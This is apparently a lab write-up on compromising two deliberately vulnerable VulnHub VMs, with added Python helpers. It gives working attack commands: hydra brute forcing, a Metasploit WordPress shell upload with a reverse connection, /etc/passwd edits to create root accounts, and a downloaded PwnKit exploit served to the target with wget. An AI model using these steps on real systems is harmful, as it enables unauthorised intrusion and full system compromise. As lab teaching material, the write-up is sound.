This section covers reconnaissance and vulnerability testing activities used to understand attack paths and support defensive improvement.
Basic pentesting is the process of identifying and testing vulnerabilities in a computer system or network. It focuses on:
Scanning for open ports and services
Enumerating users, web directories, and shares
Trying weak or default credentials
Checking for exposed services like SSH, SMB, HTTP
It simulates real-world attacks to reveal how unauthorized access could be gained.
Target VM: basic-pentesting1 (contains intentional vulnerabilities)
Attacker VM: Kali Linux, fully updated
Network: Both VMs must be on the same internal or host-only network
Adapter 1 (Host-Only):
Enable Network Adapter
Promiscuous Mode: Allow All
Virtual Cable Connected
Adapter 2 (NAT):
Network Name: TestNat
Promiscuous Mode: Allow All
Virtual Cable Connected
Update Kali Linux. In a terminal, run:
sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y
Connect both VMs to the same network(s): apply the same two-adapter configuration above (Adapter 1 Host-Only, Adapter 2 NAT Network named TestNat, both enabled, Promiscuous Mode: Allow All, Virtual Cable Connected) to the attacker VM and the target VM.
Step 1: Discover the Target:
sudo arp-scan -l
Kali IP: 192.168.56.107
Step 2: Port Scan with Nmap
Next, run a service-version scan (nmap -sV) against each host that arp-scan found and check which one is Basic Pentesting 1. It is the host that returns exactly this:
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu
80/tcp open http Apache 2.4.18 (Ubuntu)
Basic Pentesting 1 IP: 192.168.56.108
A host that shows 22/tcp ssh and 80/tcp http together with SMB (139/tcp netbios-ssn, 445/tcp microsoft-ds) is a different VM: that is the port profile of Basic Pentesting 2, which the second lab below works through.
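Added example, not part of the original lab notes: a short Python script that parses nmap's grepable (-oG) output and picks out which discovered host matches each box's expected port profile, so the two VMs are not confused. The scan output inside it is constructed (three hosts on the lab subnet; the version strings are illustrative), and the fingerprints are the port sets listed in these notes. Save the real scan with `-oG` and feed its text to `parse_gnmap` to use it on a live lab.

```python
# Added example: identify lab hosts by open-port fingerprint.
# The scan text below is CONSTRUCTED to look like `nmap -sV -oG -` output;
# nothing is scanned when this runs.
import re

# Expected open-port sets, as listed in the lab notes.
FINGERPRINTS = {
    "basic-pentesting1": {21, 22, 80},          # ftp, ssh, http
    "basic-pentesting2": {22, 80, 139, 445},    # ssh, http, SMB
}

SAMPLE_GNMAP = """\
# Nmap scan (constructed sample)
Host: 192.168.56.107 ()\tStatus: Up
Host: 192.168.56.108 ()\tStatus: Up
Host: 192.168.56.108 ()\tPorts: 21/open/tcp//ftp//ProFTPD 1.3.3c/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18/
Host: 192.168.56.109 ()\tStatus: Up
Host: 192.168.56.109 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.3.11-Ubuntu/
"""

# Grepable port field: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/tcp//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {ip: {port: (state, service, version)}} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        ip = line.split()[1]
        hosts.setdefault(ip, {})          # a Status-only line still registers the host
        if "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1]
        for port, state, service, version in PORT_RE.findall(ports_field):
            hosts[ip][int(port)] = (state, service, version)
    return hosts


def open_ports(portmap):
    return {p for p, (state, _, _) in portmap.items() if state == "open"}


def identify(hosts, fingerprints=FINGERPRINTS):
    """Map each IP to the box whose expected port set is contained in what
    was observed; the most specific (largest) fingerprint wins, None if none fit."""
    result = {}
    for ip, portmap in hosts.items():
        opened = open_ports(portmap)
        matches = [(len(fp), name) for name, fp in fingerprints.items() if fp <= opened]
        result[ip] = max(matches)[1] if matches else None
    return result


if __name__ == "__main__":
    for ip, box in identify(parse_gnmap(SAMPLE_GNMAP)).items():
        print(f"{ip:16} -> {box or 'no match (attacker or unknown host)'}")
```

Subset matching rather than exact matching is deliberate: a real scan of the second box also shows ports the notes do not list, and an exact comparison would then match nothing.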
The path on this machine: web enumeration → find the WordPress install and its users → log in to WordPress → upload a shell as www-data → privilege escalation to root.
Step 3: Web Enumeration
Open browser to http://[TARGET_IP]
Look for pages, forms, login areas.
Use:
gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirb/common.txt
Tools:
nikto for quick web vuln scan.
whatweb for tech stack info.
The browser shows the default Apache page, which confirms that the basic-pentesting1 VM is running a web server (Apache 2) on port 80 at 192.168.56.108.
The gobuster scan revealed multiple interesting paths, especially /secret/.
Gobuster reports it as an HTTP 301: Apache redirects a directory requested without its trailing slash, so the directory exists and is reachable. That's a lead worth pursuing.
Step 4 Visit the page
Open in browser:
http://192.168.56.108/secret/
You're looking for anything like:
Credentials
Notes/messages
Usernames (post authors, login hints) 👀
Maybe a hint toward a login worth brute forcing
This is exactly where the next breadcrumbs are hidden: /secret/ turns out to be a WordPress site.
Now we need to dig deeper inside WordPress to extract usernames and eventually a password for its admin login.
Step 5 Enumerate WordPress users. Go to terminal and type:
wpscan --url http://192.168.56.108/secret/ --enumerate u
User found: admin
Step 6 Attempt WordPress Admin Login bruteforce
Brute-force the WordPress login form with hydra (this is an HTTP POST form attack, not SSH). The last field of the http-post-form string is the text that marks a failed attempt, so it must actually appear in the response to a wrong password. For a valid username WordPress answers a wrong password with "The password you entered for the username admin is incorrect"; "Invalid username" never appears, so using it makes every guess look like a hit. Go to terminal:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.108 http-post-form "/secret/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -V
With the failure string "Invalid username", hydra reported the first entries of rockyou.txt as valid passwords. Those are false positives caused by the wrong condition string, not evidence of password reuse or a weak policy; the list below is what that run printed:
admin : 123456
admin : password
admin : iloveyou
admin : princess
admin : nicole
admin : 1234567
admin : rockyou
admin : abc123
admin : 12345
admin : daniel
admin : lovely
admin : monkey
admin : babygirl
admin : jessica
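Added example, not part of the original lab notes: hydra's http-post-form decision rule reimplemented in Python so the false positive above can be reproduced offline. The WordPress responses are constructed to mirror wp-login.php behaviour (error banner for a wrong password, 302 redirect on success); nothing is sent to a server, and the only valid credential is the admin:admin pair found in these notes.

```python
# Added example: why the hydra condition string decides what "valid" means.
# Responses are CONSTRUCTED stand-ins for POST /secret/wp-login.php.

VALID = {"admin": "admin"}   # the real credentials on this box


def wordpress_login(user, password):
    """Return the raw HTTP response text hydra would search for its condition."""
    if VALID.get(user) == password:
        return ("HTTP/1.1 302 Found\r\n"
                "Location: http://vtcsec/secret/wp-admin/\r\n"
                "Set-Cookie: wordpress_logged_in_x=...; HttpOnly\r\n\r\n")
    if user in VALID:
        body = ('<div id="login_error">ERROR: The password you entered for the '
                'username <strong>admin</strong> is incorrect.</div>')
    else:
        body = '<div id="login_error">ERROR: Invalid username.</div>'
    return "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + body


def hydra_says_valid(response, condition):
    """hydra's rule for the last field of the http-post-form string:
    'S=text'  -> success when text IS present in the response;
    'F=text' or bare text -> success when text is ABSENT (default failure-string mode)."""
    if condition.startswith("S="):
        return condition[2:] in response
    needle = condition[2:] if condition.startswith("F=") else condition
    return needle not in response


def brute(user, passwords, condition):
    """Return the (user, password) pairs hydra would print as valid."""
    return [(user, pw) for pw in passwords
            if hydra_says_valid(wordpress_login(user, pw), condition)]


if __name__ == "__main__":
    guesses = ["123456", "password", "iloveyou", "admin"]
    for cond in ("Invalid username", "F=incorrect", "S=302"):
        print(f"{cond:18} -> {brute('admin', guesses, cond)}")
```

Check the condition string by hand before a long run: send one deliberately wrong password and confirm the chosen failure text is in that response, or use an S= condition on the 302 redirect that only a successful login produces.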
Open browser:
http://vtcsec/secret/wp-login.php
The WordPress site URL uses the hostname vtcsec, so map vtcsec to 192.168.56.108 in Kali's /etc/hosts first or the page will not load.
Use the default credentials:
Username: admin
Password: admin
Next Goal: Use the WordPress admin access with Metasploit → get a meterpreter shell → escalate → become root
Open msfconsole and configure the authenticated plugin-upload module. It needs the target, the WordPress path, the admin credentials and the Kali IP for the reverse connection; the values below are this lab's:
msfconsole
search wp_admin_shell_upload
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.56.108
set TARGETURI /secret/
set USERNAME admin
set PASSWORD admin
set LHOST 192.168.56.107
show options
exploit
If everything is correct, you should get a line saying the Meterpreter session opened, followed by the prompt:
meterpreter >
In Meterpreter, open a system shell:
shell
The shell prints no prompt, so confirm it is alive with:
id
Expected output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /
pwd
You should now see:
/
Check for Python:
which python
which python3
Step 7 Upgrade to a full TTY (su and sudo refuse to run without one). If python3 exists, run:
python3 -c 'import pty; pty.spawn("/bin/bash")'
You should now have:
www-data@ubuntu:/#
ls -l /etc/passwd
If you see:
-rw-rw-rw-
the privilege escalation door is wide open: /etc/passwd is world-writable, so any user, including www-data, can edit it.
A password hash placed in the second field of a passwd entry is honoured directly (the x normally there tells the system to look in /etc/shadow instead), so we can set our own root password, or add a second UID 0 account, for instant root.
Now let’s finish this and become ROOT.
Press:
Ctrl + Z
It will ask:
Background? [y/N]
Type:
y
You should now see:
meterpreter >
In meterpreter:
download /etc/passwd .
You will see something like:
[*] Downloaded /etc/passwd -> passwd
This file is now on your host (Kali).
Choose a password you want for root (example: hello)
In a new terminal (not meterpreter):
openssl passwd -1 hello
Copy the hash output.
Example format:
$1$8hd1.xyz$V7n3jfa09sdEXAMPLEHASH
Open the downloaded passwd:
nano passwd
Find the first line:
root:x:0:0:root:/root:/bin/bash
Replace x with the hash you generated:
root:$1$whateverYourHashIs:0:0:root:/root:/bin/bash
Ctrl+O → Enter → Ctrl+X to save.
Push the edited file back over the original from meterpreter:
upload passwd /etc/passwd
Then open a system shell again (shell, followed by the python3 pty trick from Step 7) and run su root with the password you hashed.
Alternatively, skip the download/edit/upload round trip and append a second UID 0 account straight from your www-data shell. Single-quote the entry, otherwise bash expands the $1 and $w2o09 fragments and corrupts the hash, and generate the hash yourself with openssl passwd -1 as above (the plaintext for the hash shown here is not recorded in these notes):
echo 'lake:$1$dDYT0HPy$w2o09.QJ.wjxN/ge1OgVE.:0:0:root:/root:/bin/bash' >> /etc/passwd
su lake
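Added example, not part of the original lab notes: the /etc/passwd abuse above done in Python on a copy of the file, with the checks the notes leave implicit (is the file really world-writable, is the hash well formed, how many UID 0 accounts exist afterwards) and the correctly quoted shell one-liner. The sample passwd content and the hash are constructed; the hash only has the `$1$salt$digest` shape that `openssl passwd -1` produces and is not the hash of any known password. Run it against a downloaded copy, never the live file on Kali.

```python
# Added example: edit a COPY of /etc/passwd for the world-writable case.
import os
import re
import stat
import tempfile

# md5crypt as produced by `openssl passwd -1`: $1$<1-8 char salt>$<22 char digest>
MD5CRYPT_RE = re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")

# CONSTRUCTED placeholder with the right shape; generate your own for real use.
PLACEHOLDER_HASH = "$1$abcdefgh$0123456789abcdefghijkl"

# CONSTRUCTED sample file content.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lab:x:1000:1000:lab,,,:/home/lab:/bin/bash
"""


def is_world_writable(path):
    """The precondition for this attack: the other-write bit is set."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def _check_hash(h):
    if not MD5CRYPT_RE.match(h):
        raise ValueError("expected an md5crypt hash, i.e. the output of `openssl passwd -1`")


def set_root_password(lines, hash_):
    """Option A: put a hash in root's password field. A hash here overrides the
    'x' indirection, so /etc/shadow is no longer consulted for root."""
    _check_hash(hash_)
    out = []
    for line in lines:
        f = line.split(":")
        if len(f) == 7 and f[0] == "root":
            f[1] = hash_
        out.append(":".join(f))
    return out


def add_uid0_user(lines, name, hash_):
    """Option B: append a second UID 0 account (what the echo one-liner does)."""
    _check_hash(hash_)
    if any(l.split(":")[0] == name for l in lines if l):
        raise ValueError(f"{name} already exists")
    return lines + [f"{name}:{hash_}:0:0:root:/root:/bin/bash"]


def shell_append_line(name, hash_):
    """The one-liner for the www-data shell. Single quotes are essential: inside
    double quotes the shell would expand $1 and the $digest fragment of the hash."""
    _check_hash(hash_)
    return f"echo '{name}:{hash_}:0:0:root:/root:/bin/bash' >> /etc/passwd"


def uid0_accounts(lines):
    """Defender's check: every UID 0 account. Anything besides root is a backdoor."""
    return [f[0] for f in (l.split(":") for l in lines) if len(f) == 7 and f[2] == "0"]


def demo():
    """Write the sample to a temp file, make it world-writable, apply option A."""
    tmp = tempfile.NamedTemporaryFile("w", delete=False, suffix=".passwd")
    tmp.write(SAMPLE_PASSWD)
    tmp.close()
    os.chmod(tmp.name, 0o666)           # the misconfiguration this box has
    writable = is_world_writable(tmp.name)
    edited = set_root_password(SAMPLE_PASSWD.splitlines(), PLACEHOLDER_HASH)
    os.unlink(tmp.name)
    return writable, edited


if __name__ == "__main__":
    writable, edited = demo()
    print("world-writable:", writable)
    print("\n".join(edited))
    print(shell_append_line("lake", PLACEHOLDER_HASH))
```

The `uid0_accounts` check is also the thing to run after the lab on any real host: a second UID 0 entry, or a root line whose second field is not `x`, is exactly the artefact this attack leaves behind.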
Alternative route to root: PwnKit (CVE-2021-4034 in pkexec). On Kali, download the ready-to-run exploit:
cd ~/Downloads
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
Confirm the file is there:
ls -l PwnKit
Serve that folder over HTTP so the target can fetch the file:
python3 -m http.server 8080
✅ Confirm the file is accessible at:
http://192.168.56.107:8080/PwnKit
On the target, from the www-data shell:
cd /tmp
wget http://192.168.56.107:8080/PwnKit
chmod +x PwnKit
./PwnKit
Now confirm:
whoami
id
hostname
Expected:
root
uid=0(root) gid=0(root)
🎉 GAME OVER. You have full system compromise.
Prep Your Lab Environment (30 mins)
Tool Requirements:
Kali Linux (attacker VM)
VulnHub Basic Pentesting 2 VM (target)
Optional: Use pfSense to simulate segmented internal networks
Networking: Set both Kali and target VM to Host-Only Adapter in VirtualBox for isolated lab testing.
Reconnaissance & Enumeration
Check Kali IP range
Command: ip a
Purpose: Identify Kali’s IP and confirm the Host-Only network range (192.168.56.0/24).
Host discovery
Command: sudo netdiscover -r 192.168.56.0/24
Purpose: Identify live hosts on the local subnet and locate the target VM.
Initial Nmap scan (host enumeration)
Command:
sudo nmap -sS -sV -O -A 192.168.56.109 -oN bp2-initial-scan.txt
Purpose: Discover open ports, services, versions, OS information, and save results for analysis.
HTTP service enumeration
Action: Open http://192.168.56.109 in Firefox.
Purpose: Manually review the web application and identify visible directories or pages.
Web directory brute-force
Command:
gobuster dir -u http://192.168.56.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
Purpose: Find directories that are not linked from the site, such as /development.
Web vulnerability scanning
Command: nikto -h 192.168.56.109
Purpose: Identify default files, misconfigurations, and potentially exploitable web vulnerabilities.
Browse exposed development directory
Action: Navigate to http://192.168.56.109/development in the browser.
Purpose: Review exposed text/files for usernames, credentials, or system info.
SMB enumeration for usernames
Command: enum4linux 192.168.56.109
Purpose: Enumerate SMB shares and extract valid usernames (e.g., jan).
Credential Attacks & Initial Access
Brute-force SSH credentials with Hydra
Command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.56.109 ssh
Purpose: Discover valid SSH password for user jan (password: armando).
Gain SSH access as jan
Command: ssh jan@192.168.56.109
Action: Enter password armando when prompted.
Purpose: Obtain an interactive shell on the target system.
Local enumeration as jan
Commands:
ls
cd ..
cd kay
ls -al
Purpose: Explore user home directories and identify interesting files such as pass.bak.
Confirm access level
Commands:
id
whoami
Purpose: Verify current user and privilege level (non-root, limited access).
Privilege Escalation
Enumerate SetUID binaries
Command:
find / -perm -4000 2>/dev/null
Purpose: Identify binaries running with elevated (root) privileges, including SUID-enabled vim.
Inspect password backup file
Command:
vim pass.bak
Purpose: View and extract the stored password for user kay. This works because vim is SUID root: it opens /home/kay/pass.bak with root's privileges regardless of the file's own permissions, which jan could not otherwise read.
Switch to kay using recovered password
Command:
su kay
Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Purpose: Elevate from jan to kay, a more privileged local user.
Gain root access
Command:
sudo su
Purpose: Use sudo from kay’s account to obtain a root shell.
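Added example, not part of the original lab notes: a Python triage of the `find / -perm -4000 2>/dev/null` output from the Privilege Escalation steps above, comparing it against a baseline of SUID binaries a stock Ubuntu 16.04 install ships with and flagging anything extra with a note on why it matters. The baseline is an assumption (a trimmed list written from the distribution defaults, not authoritative), and the find output is constructed to resemble the Basic Pentesting 2 box; paste the real output to use it on a live host.

```python
# Added example: flag SUID binaries that are not part of a stock install.
import os

# ASSUMED baseline: common SUID-root binaries on a default Ubuntu 16.04 system.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Why an unexpected SUID binary matters, keyed by basename (the ones these labs hit).
ABUSE_HINTS = {
    "vim": "editor runs as root: read any file (kay's pass.bak) or write /etc/passwd",
    "vim.basic": "editor runs as root: read any file (kay's pass.bak) or write /etc/passwd",
}
DEFAULT_HINT = "not in baseline; investigate what it does with root privileges"

# CONSTRUCTED `find / -perm -4000` output resembling the second lab's target.
FIND_OUTPUT = """\
/bin/su
/bin/mount
/bin/umount
/bin/ping
/bin/ping6
/bin/fusermount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/vim.basic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
"""


def parse_find_output(text):
    """Absolute paths only, deduplicated and sorted; find's error noise is dropped."""
    return sorted({line.strip() for line in text.splitlines() if line.startswith("/")})


def unexpected_suid(paths, baseline=BASELINE):
    return [p for p in paths if p not in baseline]


def triage(text, baseline=BASELINE):
    """Return [(path, hint)] for every SUID binary outside the baseline."""
    return [(p, ABUSE_HINTS.get(os.path.basename(p), DEFAULT_HINT))
            for p in unexpected_suid(parse_find_output(text), baseline)]


if __name__ == "__main__":
    for path, hint in triage(FIND_OUTPUT):
        print(f"{path}: {hint}")
```

The same comparison is the defender's periodic check: a SUID bit on an editor, interpreter or archiver is almost never intended, and the diff against a known-good baseline surfaces it immediately.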
🏁 Flag Capture
Verify root privileges
Command: whoami
Purpose: Confirm that the current user is root
Read the final flag
Command:
cat /root/flag.txt
Purpose: Access and capture the final flag, confirming full system compromise.